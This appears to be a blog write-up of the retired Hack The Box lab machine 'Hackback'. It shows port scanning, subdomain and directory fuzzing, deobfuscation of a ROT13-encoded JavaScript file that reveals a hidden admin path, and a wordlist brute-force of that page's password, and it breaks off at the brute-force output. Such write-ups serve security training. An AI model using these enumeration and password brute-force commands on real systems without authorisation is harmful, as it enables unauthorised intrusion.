Hack The Box - Hackback

Quick Summary

Hey guys today Hackback retired and here’s my write-up about it. Hackback was a very hard machine full of different steps and rabbit holes. It’s a Windows machine and its ip is 10.10.10.128, I added it to /etc/hosts as hackback.htb. Let’s jump right in !

Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC hackback.htb

We got two http ports, 80 and 6666, I also ran a full scan but we’ll get to that later.

HTTP

I checked both ports, on 80 there was this donkey image :

I ran gobuster and it got nothing.
I couldn’t send a request to port 6666 from the browser so I used curl :

1
2
root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/ 
"Missing Command!"

It says "Missing Command!"
So I tried /help :

1
2
root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/help
"hello,proc,whoami,list,info,services,netsat,ipconfig"

It returned a list of what commands we can use. /whoami lists information about the user running this service, not really important. /list lists the files in the current directory :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/list
[
{
"Name": "aspnet_client",
"length": null
},
{
"Name": "default",
"length": null
},
{
"Name": "new_phish",
"length": null
},
{
"Name": "http.ps1",
"Length": 1867
},
{
"Name": "iisstart.htm",
"Length": 703
},
{
"Name": "iisstart.png",
"Length": 99710
}
]

/info prints system information, we might need that :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/info
{
"WindowsBuildLabEx": "17763.1.amd64fre.rs5_release.180914-1434",
"WindowsCurrentVersion": "6.3",
"WindowsEditionId": "ServerStandard",
"WindowsInstallationType": "Server",
"WindowsInstallDateFromRegistry": "\/Date(1542436874000)\/",
"WindowsProductId": "00429-00520-27817-AA520",
"WindowsProductName": "Windows Server 2019 Standard",
"WindowsRegisteredOrganization": "",
"WindowsRegisteredOwner": "Windows User",
"WindowsSystemRoot": "C:\\Windows",
"WindowsVersion": "1809",
"BiosCharacteristics": null,
"BiosBIOSVersion": null,
"BiosBuildNumber": null,
"BiosCaption": null,
"BiosCodeSet": null,
"BiosCurrentLanguage": null,
"BiosDescription": null,
"BiosEmbeddedControllerMajorVersion": null,
"BiosEmbeddedControllerMinorVersion": null,
"BiosFirmwareType": null,
"BiosIdentificationCode": null,
"BiosInstallableLanguages": null,
"BiosInstallDate": null,
"BiosLanguageEdition": null,
"BiosListOfLanguages": null,
"BiosManufacturer": null,
"BiosName": null,
"BiosOtherTargetOS": null,
"BiosPrimaryBIOS": null,
"BiosReleaseDate": null,
"BiosSeralNumber": null,
"BiosSMBIOSBIOSVersion": null,
"BiosSMBIOSMajorVersion": null,
"BiosSMBIOSMinorVersion": null,
"BiosSMBIOSPresent": null,
"BiosSoftwareElementState": null,
"BiosStatus": null,
"BiosSystemBiosMajorVersion": null,
"BiosSystemBiosMinorVersion": null,
"BiosTargetOperatingSystem": null,
"BiosVersion": null,
"CsAdminPasswordStatus": null,
"CsAutomaticManagedPagefile": null,
"CsAutomaticResetBootOption": null,
"CsAutomaticResetCapability": null,
"CsBootOptionOnLimit": null,
"CsBootOptionOnWatchDog": null,
"CsBootROMSupported": null,
"CsBootStatus": null,
"CsBootupState": null,
"CsCaption": null,
"CsChassisBootupState": null,
"CsChassisSKUNumber": null,
"CsCurrentTimeZone": null,
"CsDaylightInEffect": null,
"CsDescription": null,
"CsDNSHostName": null,
"CsDomain": null,
"CsDomainRole": null,
"CsEnableDaylightSavingsTime": null,
"CsFrontPanelResetStatus": null,
"CsHypervisorPresent": null,
"CsInfraredSupported": null,
"CsInitialLoadInfo": null,
"CsInstallDate": null,
"CsKeyboardPasswordStatus": null,
"CsLastLoadInfo": null,
"CsManufacturer": null,
"CsModel": null,
"CsName": null,
"CsNetworkAdapters": null,
"CsNetworkServerModeEnabled": null,
"CsNumberOfLogicalProcessors": null,
"CsNumberOfProcessors": null,
"CsProcessors": null,
"CsOEMStringArray": null,
"CsPartOfDomain": null,
"CsPauseAfterReset": null,
"CsPCSystemType": null,
"CsPCSystemTypeEx": null,
"CsPowerManagementCapabilities": null,
"CsPowerManagementSupported": null,
"CsPowerOnPasswordStatus": null,
"CsPowerState": null,
"CsPowerSupplyState": null,
"CsPrimaryOwnerContact": null,
"CsPrimaryOwnerName": null,
"CsResetCapability": null,
"CsResetCount": null,
"CsResetLimit": null,
"CsRoles": null,
"CsStatus": null,
"CsSupportContactDescription": null,
"CsSystemFamily": null,
"CsSystemSKUNumber": null,
"CsSystemType": null,
"CsThermalState": null,
"CsTotalPhysicalMemory": null,
"CsPhyicallyInstalledMemory": null,
"CsUserName": null,
"CsWakeUpType": null,
"CsWorkgroup": null,
"OsName": null,
"OsType": null,
"OsOperatingSystemSKU": null,
"OsVersion": null,
"OsCSDVersion": null,
"OsBuildNumber": null,
"OsHotFixes": null,
"OsBootDevice": null,
"OsSystemDevice": null,
"OsSystemDirectory": null,
"OsSystemDrive": null,
"OsWindowsDirectory": null,
"OsCountryCode": null,
"OsCurrentTimeZone": null,
"OsLocaleID": null,
"OsLocale": null,
"OsLocalDateTime": null,
"OsLastBootUpTime": null,
"OsUptime": null,
"OsBuildType": null,
"OsCodeSet": null,
"OsDataExecutionPreventionAvailable": null,
"OsDataExecutionPrevention32BitApplications": null,
"OsDataExecutionPreventionDrivers": null,
"OsDataExecutionPreventionSupportPolicy": null,
"OsDebug": null,
"OsDistributed": null,
"OsEncryptionLevel": null,
"OsForegroundApplicationBoost": null,
"OsTotalVisibleMemorySize": null,
"OsFreePhysicalMemory": null,
"OsTotalVirtualMemorySize": null,
"OsFreeVirtualMemory": null,
"OsInUseVirtualMemory": null,
"OsTotalSwapSpaceSize": null,
"OsSizeStoredInPagingFiles": null,
"OsFreeSpaceInPagingFiles": null,
"OsPagingFiles": null,
"OsHardwareAbstractionLayer": null,
"OsInstallDate": null,
"OsManufacturer": null,
"OsMaxNumberOfProcesses": null,
"OsMaxProcessMemorySize": null,
"OsMuiLanguages": null,
"OsNumberOfLicensedUsers": null,
"OsNumberOfProcesses": null,
"OsNumberOfUsers": null,
"OsOrganization": null,
"OsArchitecture": null,
"OsLanguage": null,
"OsProductSuites": null,
"OsOtherTypeDescription": null,
"OsPAEEnabled": null,
"OsPortableOperatingSystem": null,
"OsPrimary": null,
"OsProductType": null,
"OsRegisteredUser": null,
"OsSerialNumber": null,
"OsServicePackMajorVersion": null,
"OsServicePackMinorVersion": null,
"OsStatus": null,
"OsSuites": null,
"OsServerLevel": 4,
"KeyboardLayout": null,
"TimeZone": "(UTC-08:00) Pacific Time (US \u0026 Canada)",
"LogonServer": null,
"PowerPlatformRole": 1,
"HyperVisorPresent": null,
"HyperVRequirementDataExecutionPreventionAvailable": null,
"HyperVRequirementSecondLevelAddressTranslation": null,
"HyperVRequirementVirtualizationFirmwareEnabled": null,
"HyperVRequirementVMMonitorModeExtensions": null,
"DeviceGuardSmartStatus": 0,
"DeviceGuardRequiredSecurityProperties": null,
"DeviceGuardAvailableSecurityProperties": null,
"DeviceGuardSecurityServicesConfigured": null,
"DeviceGuardSecurityServicesRunning": null,
"DeviceGuardCodeIntegrityPolicyEnforcementStatus": null,
"DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus": null
}

/services lists the services, that’s also important and we might need it later :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@kali:~/Desktop/HTB/boxes/hackback# curl http://hackback.htb:6666/services
[
{
"name": "AJRouter",
"startname": "NT AUTHORITY\\LocalService",
"displayname": "AllJoyn Router Service",
"status": "OK"
},
{
"name": "ALG",
"startname": "NT AUTHORITY\\LocalService",
"displayname": "Application Layer Gateway Service",
"status": "OK"
},
{
"name": "AppHostSvc",
"startname": "localSystem",
"displayname": "Application Host Helper Service",
"status": "OK"
},

-------------------
Removed Long Output
-------------------

{
"name": "WpnService",
"startname": "LocalSystem",
"displayname": "Windows Push Notifications System Service",
"status": "OK"
},
{
"name": "WSearch",
"startname": "LocalSystem",
"displayname": "Windows Search",
"status": "OK"
},
{
"name": "wuauserv",
"startname": "LocalSystem",
"displayname": "Windows Update",
"status": "OK"
}
]

/netstat lists the listening ports, we can check that when we need to know about some internal services but for now we will just ignore it. The rest of the commands are not really doing anything useful. I tried to exploit this service since it’s executing system commands, however it wasn’t possible.
I used wfuzz with subdomains-top1million-5000.txt from seclists to enumerate any possible subdomains :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@kali:~/Desktop/HTB/boxes/hackback# wfuzz --hc 614 -c -w subdomains-top1mil-5000.txt -H "HOST: FUZZ.hackback.htb" http://10.10.10.128

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

*****
* Wfuzz 2.3.4 - The Web Fuzzer *
*****
Target: http://10.10.10.128/
Total requests: 4997

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000007: C=200 33 L 54 W 614 Ch "webdisk"
000008: C=200 33 L 54 W 614 Ch "pop"
000001: C=200 33 L 54 W 614 Ch "www"
000002: C=200 33 L 54 W 614 Ch "mail"
000005: C=200 33 L 54 W 614 Ch "webmail"
000006: C=200 33 L 54 W 614 Ch "smtp"
000009: C=200 33 L 54 W 614 Ch "cpanel"
000010: C=200 33 L 54 W 614 Ch "whm"
000003: C=200 33 L 54 W 614 Ch "ftp"
000004: C=200 33 L 54 W 614 Ch "localhost"
000011: C=200 33 L 54 W 614 Ch "ns1"
000013: C=200 33 L 54 W 614 Ch "autodiscover"
000014: C=200 33 L 54 W 614 Ch "autoconfig"
000015: C=200 33 L 54 W 614 Ch "ns"
000016: C=200 33 L 54 W 614 Ch "test"
000012: C=200 33 L 54 W 614 Ch "ns2"
000017: C=200 33 L 54 W 614 Ch "m"
000020: C=200 33 L 54 W 614 Ch "www2"
000021: C=200 33 L 54 W 614 Ch "ns3"
000018: C=200 33 L 54 W 614 Ch "blog"
000019: C=200 33 L 54 W 614 Ch "dev"
000023: C=200 33 L 54 W 614 Ch "forum"
000022: C=200 33 L 54 W 614 Ch "pop3"
000026: C=200 33 L 54 W 614 Ch "vpn"
000025: C=200 33 L 54 W 614 Ch "mail2"
000024: C=200 27 L 66 W 825 Ch "admin"
000027: C=200 33 L 54 W 614 Ch "mx"

^C
Finishing pending requests...

admin gave a different response length, I added it to /etc/hosts :

It had this login form :

Which actually didn’t do anything :

1
2
3
4
5
6
7
8
9
10
11
<form action="#" method="post">
<!-- USERNAME INPUT -->
<label for="username">Username</label>
<input type="text" placeholder="Enter Username">
<!-- PASSWORD INPUT -->
<label for="password">Password</label>
<input type="password" placeholder="Enter Password">
<input type="submit" value="Log In">
<a href="lost">Lost your Password?</a>
<a href="signup">Don't have An account?</a>
</form>

Also the password reset and sign-up pages are non-existent :

By looking at the page source :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Admin Login</title>
<link rel="stylesheet" href="/css/master.css">
<!-- <script SRC="js/.js"></script> -->
</head>
<body>

<div class="login-box">
<img src="img/logo.png" class="avatar" alt="Avatar Image">
<h1>Login Here</h1>
<form action="#" method="post">
<!-- USERNAME INPUT -->
<label for="username">Username</label>
<input type="text" placeholder="Enter Username">
<!-- PASSWORD INPUT -->
<label for="password">Password</label>
<input type="password" placeholder="Enter Password">
<input type="submit" value="Log In">
<a href="lost">Lost your Password?</a>
<a href="signup">Don't have An account?</a>
</form>
</div>
</body>
</html>

We notice this weird comment : <!-- <script SRC="js/.js"></script> -->
However /js gave a 403 :

I ran gobuster with /usr/share/wordlists/dirb/common.txt and .js extension :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/Desktop/HTB/boxes/hackback# gobuster -u http://admin.hackback.htb/js/ -w /usr/share/wordlists/dirb/common.txt -x js
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://admin.hackback.htb/js/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : js
[+] Timeout : 10s
=====================================================
2019/07/05 09:37:16 Starting gobuster
=====================================================
/private.js (Status: 200)

Script Deobfuscation

By looking at private.js it’s not really what we expect a javascript file to be :

1
2
3
<script>
ine n=['\k57\k78\k49\k6n\k77\k72\k37\k44\k75\k73\k4s\k38\k47\k73\k4o\k76\k52\k77\k42\k2o\k77\k71\k33\k44\k75\k4q\k4o\k72\k77\k72\k4p\k44\k67\k63\k4s\k69\k77\k72\k59\k31\k4o\k45\k45\k67\k47\k38\k4o\k43\k77\k71\k37\k44\k6p\k38\k4o\k33','\k41\k63\k4s\k4q\k77\k71\k76\k44\k71\k51\k67\k43\k77\k34\k2s\k43\k74\k32\k6r\k44\k74\k4q\k4o\k68\k5n\k63\k4o\k44\k77\k71\k54\k43\k70\k54\k73\k79\k77\k37\k6r\k43\k68\k73\k4s\k51\k58\k4q\k4s\k35\k57\k38\k4o\k70\k44\k73\k4s\k74\k4r\k43\k44\k44\k76\k41\k6n\k43\k67\k79\k6o\k3q','\k77\k35\k48\k44\k72\k38\k4s\k37\k64\k44\k52\k6q\k4q\k4q\k4o\k4n\k77\k34\k6n\k44\k6p\k56\k52\k6r\k77\k72\k74\k37\k77\k37\k73\k30\k77\k6s\k31\k61\k77\k37\k73\k41\k51\k73\k4o\k73\k66\k73\k4s\k45\k77\k34\k58\k44\k73\k52\k6n\k43\k6p\k4q\k4s\k77\k46\k7n\k72\k43\k6q\k7n\k70\k76\k43\k41\k6n\k43\k75\k42\k7n\k44\k73\k73\k4o\k39\k46\k38\k4s\k34\k77\k71\k5n\k6r\k57\k73\k4o\k68'];(shapgvba(p,q){ine r=shapgvba(s){juvyr(--s){p['chfu'](p['fuvsg']());}};r(++q);}(n,0k66));ine o=shapgvba(p,q){p=p-0k0;ine r=n[p];vs(o['ZfHYzi']===haqrsvarq){(shapgvba(){ine s;gel{ine t=Shapgvba('erghea\k20(shapgvba()\k20'+'{}.pbafgehpgbe(\k22erghea\k20guvf\k22)(\k20)'+');');s=t();}pngpu(u){s=jvaqbj;}ine v='NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/=';s['ngbo']||(s['ngbo']=shapgvba(w){ine x=Fgevat(w)['ercynpr'](/=+$/,'');sbe(ine y=0k0,z,a,b=0k0,c='';a=x['puneNg'](b++);~a&&(z=y%0k4?z*0k40+a:a,y++%0k4)?c+=Fgevat['sebzPunePbqr'](0kss&z>>(-0k2*y&0k6)):0k0){a=v['vaqrkBs'](a);}erghea c;});}());ine d=shapgvba(e,q){ine g=[],h=0k0,i,j='',k='';e=ngbo(e);sbe(ine l=0k0,m=e['yratgu'];l<m;l++){k+='%'+('00'+e['punePbqrNg'](l)['gbFgevat'](0k10))['fyvpr'](-0k2);}e=qrpbqrHEVPbzcbarag(k);sbe(ine N=0k0;N<0k100;N++){g[N]=N;}sbe(N=0k0;N<0k100;N++){h=(h+g[N]+q['punePbqrNg'](N%q['yratgu']))%0k100;i=g[N];g[N]=g[h];g[h]=i;}N=0k0;h=0k0;sbe(ine O=0k0;O<e['yratgu'];O++){N=(N+0k1)%0k100;h=(h+g[N])%0k100;i=g[N];g[N]=g[h];g[h]=i;j+=Fgevat['sebzPunePbqr'](e['punePbqrNg'](O)^g[(g[N]+g[h])%0k100]);}erghea j;};o['BbNPpq']=d;o['dFYjTx']={};o['ZfHYzi']=!![];}ine P=o['dFYjTx'][p];vs(P===haqrsvarq){vs(o['cVwyDO']===haqrsvarq){o['cVwyDO']=!![];}r=o['BbNPpq'](r,q);o['dFYjTx'][p]=r;}ryfr{r=P;}erghea r;};ine k='\k53\k65\k63\k75\k72\k65\k20\k4p\k6s\k67\k69\k6r\k20\k42\k79\k70\k61\k73\k73';ine m=o('0k0','\k50\k5q\k53\k36');ine u=o('0k1','\k72\k37\k54\k59');ine l=o('0k2','\k44\k41\k71\k67');ine g='\k3s\k61\k63\k74\k69\k6s\k6r\k3q\k28\k73\k68\k6s\k77\k2p\k6p\k69\k73\k74\k2p\k65\k78\k65\k63\k2p\k69\k6r\k69\k74\k29';ine f='\k26\k73\k69\k74\k65\k3q\k28\k74\k77\k69\k74\k74\k65\k72\k2p\k70\k61\k79\k70\k61\k6p\k2p\k66\k61\k63\k65\k62\k6s\k6s\k6o\k2p\k68\k61\k63\k6o\k74\k68\k65\k62\k6s\k78\k29';ine v='\k26\k70\k61\k73\k73\k77\k6s\k72\k64\k3q\k2n\k2n\k2n\k2n\k2n\k2n\k2n\k2n';ine x='\k26\k73\k65\k73\k73\k69\k6s\k6r\k3q';ine j='\k4r\k6s\k74\k68\k69\k6r\k67\k20\k6q\k6s\k72\k65\k20\k74\k6s\k20\k73\k61\k79';
</script>

First thing we notice is that it’s not actually js. ine n ? This doesn’t look like js, most likely it’s gonna be var. v is the 22nd letter in alphabet while i is the 9th. 22 - 9 = 13
So this script is rot 13 encoded. I used rot13.com to decode it :

1
var a=['\x57\x78\x49\x6a\x77\x72\x37\x44\x75\x73\x4f\x38\x47\x73\x4b\x76\x52\x77\x42\x2b\x77\x71\x33\x44\x75\x4d\x4b\x72\x77\x72\x4c\x44\x67\x63\x4f\x69\x77\x72\x59\x31\x4b\x45\x45\x67\x47\x38\x4b\x43\x77\x71\x37\x44\x6c\x38\x4b\x33','\x41\x63\x4f\x4d\x77\x71\x76\x44\x71\x51\x67\x43\x77\x34\x2f\x43\x74\x32\x6e\x44\x74\x4d\x4b\x68\x5a\x63\x4b\x44\x77\x71\x54\x43\x70\x54\x73\x79\x77\x37\x6e\x43\x68\x73\x4f\x51\x58\x4d\x4f\x35\x57\x38\x4b\x70\x44\x73\x4f\x74\x4e\x43\x44\x44\x76\x41\x6a\x43\x67\x79\x6b\x3d','\x77\x35\x48\x44\x72\x38\x4f\x37\x64\x44\x52\x6d\x4d\x4d\x4b\x4a\x77\x34\x6a\x44\x6c\x56\x52\x6e\x77\x72\x74\x37\x77\x37\x73\x30\x77\x6f\x31\x61\x77\x37\x73\x41\x51\x73\x4b\x73\x66\x73\x4f\x45\x77\x34\x58\x44\x73\x52\x6a\x43\x6c\x4d\x4f\x77\x46\x7a\x72\x43\x6d\x7a\x70\x76\x43\x41\x6a\x43\x75\x42\x7a\x44\x73\x73\x4b\x39\x46\x38\x4f\x34\x77\x71\x5a\x6e\x57\x73\x4b\x68'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x66));var b=function(c,d){c=c-0x0;var e=a[c];if(b['MsULmv']===undefined){(function(){var f;try{var g=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,d){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+d['charCodeAt'](A%d['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['OoACcd']=q;b['qSLwGk']={};b['MsULmv']=!![];}var C=b['qSLwGk'][c];if(C===undefined){if(b['pIjlQB']===undefined){b['pIjlQB']=!![];}e=b['OoACcd'](e,d);b['qSLwGk'][c]=e;}else{e=C;}return e;};var x='\x53\x65\x63\x75\x72\x65\x20\x4c\x6f\x67\x69\x6e\x20\x42\x79\x70\x61\x73\x73';var z=b('0x0','\x50\x5d\x53\x36');var h=b('0x1','\x72\x37\x54\x59');var y=b('0x2','\x44\x41\x71\x67');var t='\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x28\x73\x68\x6f\x77\x2c\x6c\x69\x73\x74\x2c\x65\x78\x65\x63\x2c\x69\x6e\x69\x74\x29';var s='\x26\x73\x69\x74\x65\x3d\x28\x74\x77\x69\x74\x74\x65\x72\x2c\x70\x61\x79\x70\x61\x6c\x2c\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2c\x68\x61\x63\x6b\x74\x68\x65\x62\x6f\x78\x29';var i='\x26\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a';var k='\x26\x73\x65\x73\x73\x69\x6f\x6e\x3d';var w='\x4e\x6f\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20\x74\x6f\x20\x73\x61\x79';

Now this is better. I also used a js beautifier to make it easily readable :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
var a = ['\x57\x78\x49\x6a\x77\x72\x37\x44\x75\x73\x4f\x38\x47\x73\x4b\x76\x52\x77\x42\x2b\x77\x71\x33\x44\x75\x4d\x4b\x72\x77\x72\x4c\x44\x67\x63\x4f\x69\x77\x72\x59\x31\x4b\x45\x45\x67\x47\x38\x4b\x43\x77\x71\x37\x44\x6c\x38\x4b\x33', '\x41\x63\x4f\x4d\x77\x71\x76\x44\x71\x51\x67\x43\x77\x34\x2f\x43\x74\x32\x6e\x44\x74\x4d\x4b\x68\x5a\x63\x4b\x44\x77\x71\x54\x43\x70\x54\x73\x79\x77\x37\x6e\x43\x68\x73\x4f\x51\x58\x4d\x4f\x35\x57\x38\x4b\x70\x44\x73\x4f\x74\x4e\x43\x44\x44\x76\x41\x6a\x43\x67\x79\x6b\x3d', '\x77\x35\x48\x44\x72\x38\x4f\x37\x64\x44\x52\x6d\x4d\x4d\x4b\x4a\x77\x34\x6a\x44\x6c\x56\x52\x6e\x77\x72\x74\x37\x77\x37\x73\x30\x77\x6f\x31\x61\x77\x37\x73\x41\x51\x73\x4b\x73\x66\x73\x4f\x45\x77\x34\x58\x44\x73\x52\x6a\x43\x6c\x4d\x4f\x77\x46\x7a\x72\x43\x6d\x7a\x70\x76\x43\x41\x6a\x43\x75\x42\x7a\x44\x73\x73\x4b\x39\x46\x38\x4f\x34\x77\x71\x5a\x6e\x57\x73\x4b\x68'];
(function(c, d) {
var e = function(f) {
while (--f) {
c['push'](c['shift']());
}
};
e(++d);
}(a, 0x66));
var b = function(c, d) {
c = c - 0x0;
var e = a[c];
if (b['MsULmv'] === undefined) {
(function() {
var f;
try {
var g = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
f = g();
} catch (h) {
f = window;
}
var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
f['atob'] || (f['atob'] = function(j) {
var k = String(j)['replace'](/=+$/, '');
for (var l = 0x0, m, n, o = 0x0, p = ''; n = k['charAt'](o++); ~n && (m = l % 0x4 ? m * 0x40 + n : n, l++ % 0x4) ? p += String['fromCharCode'](0xff & m >> (-0x2 * l & 0x6)) : 0x0) {
n = i['indexOf'](n);
}
return p;
});
}());
var q = function(r, d) {
var t = [],
u = 0x0,
v, w = '',
x = '';
r = atob(r);
for (var y = 0x0, z = r['length']; y < z; y++) {
x += '%' + ('00' + r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);
}
r = decodeURIComponent(x);
for (var A = 0x0; A < 0x100; A++) {
t[A] = A;
}
for (A = 0x0; A < 0x100; A++) {
u = (u + t[A] + d['charCodeAt'](A % d['length'])) % 0x100;
v = t[A];
t[A] = t[u];
t[u] = v;
}
A = 0x0;
u = 0x0;
for (var B = 0x0; B < r['length']; B++) {
A = (A + 0x1) % 0x100;
u = (u + t[A]) % 0x100;
v = t[A];
t[A] = t[u];
t[u] = v;
w += String['fromCharCode'](r['charCodeAt'](B) ^ t[(t[A] + t[u]) % 0x100]);
}
return w;
};
b['OoACcd'] = q;
b['qSLwGk'] = {};
b['MsULmv'] = !![];
}
var C = b['qSLwGk'][c];
if (C === undefined) {
if (b['pIjlQB'] === undefined) {
b['pIjlQB'] = !![];
}
e = b['OoACcd'](e, d);
b['qSLwGk'][c] = e;
} else {
e = C;
}
return e;
};
var x = '\x53\x65\x63\x75\x72\x65\x20\x4c\x6f\x67\x69\x6e\x20\x42\x79\x70\x61\x73\x73';
var z = b('0x0', '\x50\x5d\x53\x36');
var h = b('0x1', '\x72\x37\x54\x59');
var y = b('0x2', '\x44\x41\x71\x67');
var t = '\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x28\x73\x68\x6f\x77\x2c\x6c\x69\x73\x74\x2c\x65\x78\x65\x63\x2c\x69\x6e\x69\x74\x29';
var s = '\x26\x73\x69\x74\x65\x3d\x28\x74\x77\x69\x74\x74\x65\x72\x2c\x70\x61\x79\x70\x61\x6c\x2c\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2c\x68\x61\x63\x6b\x74\x68\x65\x62\x6f\x78\x29';
var i = '\x26\x70\x61\x73\x73\x77\x6f\x72\x64\x3d\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a';
var k = '\x26\x73\x65\x73\x73\x69\x6f\x6e\x3d';
var w = '\x4e\x6f\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20\x74\x6f\x20\x73\x61\x79';

As you can see it’s still heavily obfuscated, I solved this by pasting the code in the js console. It will do the magic happening in these functions then we can just read the variables at the bottom of the script : x z h y t s i k w

We got this message :

1
2
3
4
5
6
7
8
9
Secure Login Bypass
Remember the secret path is
2bb6916122f1da34dcd916421e531578
Just in case I loose access to the admin panel
?action=(show,list,exec,init)
&site=(twitter,paypal,facebook,hackthebox)
&password=*****
&session=
Nothing more to say

Going to that path only caused a redirect, so we need to enumerate more.

Accessing the Secret Path

From the secret message we know what parameters it’s expecting us to send : (?action=&site=&password=&session=). This is probably gonna be a php page. So I ran gobuster on that path with the same wordlist I used before and .php extension :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/Desktop/HTB/boxes/hackback# gobuster -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/ -w /usr/share/wordlists/dirb/common.txt -x php

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php
[+] Timeout : 10s
=====================================================
2019/07/05 10:08:09 Starting gobuster
=====================================================
/webadmin.php (Status: 302)

Great we got webadmin.php, I tried again and now I didn’t get a redirect :

1
2
root@kali:~/Desktop/HTB/boxes/hackback# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=test&session='
Wrong secret key!

But I got Wrong secret key!, and that’s expected because I set the password to test. I used wfuzz again with darkweb2017-top10000.txt from seclists to bruteforce the password which happened to be a very easy one :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@kali:~/Desktop/HTB/boxes/hackback# wfuzz -u 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session=' -w darkweb2017-top10000.txt 

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

*****
* Wfuzz 2.3.4 - The Web Fuzzer *
*****

Target: http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session=
Total requests: 10000

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=302 0 L 3 W 17 Ch "123456"
000004: C=302 0 L 3 W 17 Ch "password"
000006: C=302 0 L 3 W 17 Ch "abc123"
000005: C=302 0 L 3 W 17 Ch "qwerty"
000007: C=302 7 L 15 W 197 Ch "12345678"
000008: C=302 0 L 3 W 17 Ch "password1"
